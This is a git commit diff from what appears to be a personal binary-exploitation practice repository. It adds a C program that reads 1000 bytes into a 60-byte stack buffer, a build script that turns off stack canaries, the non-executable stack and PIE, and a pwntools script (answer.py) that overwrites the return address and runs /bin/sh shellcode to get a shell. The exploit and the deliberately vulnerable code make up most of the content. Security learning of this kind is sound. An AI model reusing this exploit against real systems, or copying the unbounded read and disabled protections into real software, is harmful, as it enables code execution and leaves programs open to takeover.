Finished stackoverflow/no-protection

.gitignore

@@ -1,3 +1,6 @@
+# gdb
+.gdb_history
+
 # Prerequisites
 *.d
 

stackoverflow/no-protection/answer.py

@@ -0,0 +1,15 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+import os
+context.log_level="debug"
+context(arch="amd64",os="linux")
+
+p=process('./hello')
+shellcode=asm(shellcraft.sh())
+len_sc=len(shellcode)
+payload=0x48*'0'+p64(0x00007ffff7a08118)+shellcode
+with open('payload.txt', 'w') as f:
+	f.write(payload)
+p.sendline(payload)
+p.interactive()

stackoverflow/no-protection/compile.sh

@@ -0,0 +1,2 @@
+#!/bin/sh
+gcc hello.c -g -o hello -zexecstack -fno-stack-protector -no-pie

stackoverflow/no-protection/hello.c

@@ -0,0 +1,13 @@
+#include <stdio.h>
+#include <string.h>
+#include <unistd.h>
+void SayHello(void){
+    char tmpName[60];
+    read(0, tmpName, 1000);
+    printf("Hello %s\n", tmpName);
+}
+
+int main(int argc, char** argv){
+    SayHello();
+    return 0;
+}

stackoverflow/no-protection/peda-session-hello.txt

@@ -0,0 +1,2 @@
+break SayHello
+